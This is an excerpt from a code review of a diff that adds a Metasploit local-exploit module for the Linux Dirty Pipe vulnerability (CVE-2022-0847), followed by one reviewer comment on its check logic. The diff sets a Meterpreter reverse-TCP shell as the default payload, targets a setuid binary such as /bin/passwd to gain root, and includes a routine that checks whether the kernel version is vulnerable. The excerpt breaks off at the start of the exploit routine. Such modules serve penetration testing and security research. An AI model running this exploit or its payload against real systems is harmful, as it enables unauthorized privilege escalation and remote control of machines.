modules/exploits/linux/local/cve_2022_0847_dirtypipe.rb

```diff
@@ -0,0 +1,187 @@
+          'timwr', # Metasploit Module
+        ],
+        'DisclosureDate' => '2022-02-20',
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Platform' => [ 'linux' ],
+        'Arch' => [
+          ARCH_X64,
+          ARCH_X86,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+        ],
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'AppendExit' => true,
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependSetreuid' => true,
+          'PrependSetuid' => true,
+          'PrependFork' => true,
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+        },
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2022-0847' ],
+          [ 'URL', 'https://dirtypipe.cm4all.com' ],
+          [ 'URL', 'https://haxx.in/files/dirtypipez.c' ],
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new('SUID_BINARY_PATH', [ false, 'The path to a suid binary', '/bin/passwd' ])
+    ])
+  end
+
+  def check
+    # Is the arch supported?
+    arch = kernel_arch
+    unless live_compile? || arch.include?('x64') || arch.include?('aarch64') || arch.include?('x86') || arch.include?('armle')
+      return CheckCode::Safe("System architecture #{arch} is not supported without live compilation")
+    end
+
+    kernel_version = Rex::Version.new kernel_release.split('-').first
+    if kernel_version < Rex::Version.new('5.8') ||
+       kernel_version >= Rex::Version.new('5.16.11') ||
+       (kernel_version >= Rex::Version.new('5.15.25') && kernel_version < Rex::Version.new('5.16')) ||
+       (kernel_version >= Rex::Version.new('5.10.102') && kernel_version < Rex::Version.new('5.11'))
+      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")
+    end
+
+    vprint_good "Linux kernel version #{kernel_version} appears vulnerable"
+
+    # check the binary
+    suid_binary_path = datastore['SUID_BINARY_PATH']
+    return CheckCode::Safe('The suid binary was not found; try setting SUID_BINARY_PATH') if suid_binary_path.nil?
+
+    return CheckCode::Safe("The #{suid_binary_path} binary setuid bit is not set") unless setuid?(suid_binary_path)
+
+    # run the exploit in check mode if everything looks right
+    if run_exploit(true)
+      return CheckCode::Vulnerable
+    end
+
+    return CheckCode::Safe('The target does not appear vulnerable')
+  end
+
+  def run_exploit(check_mode)
+    if is_root? && !datastore['ForceExploit']
+      print_error 'Session already has root privileges. Set ForceExploit to override.'
+      return false
```

Comment:
In check mode this should this continue anyway as root?  Returning `false` here will make check return `Safe` if the request is made when already `root`.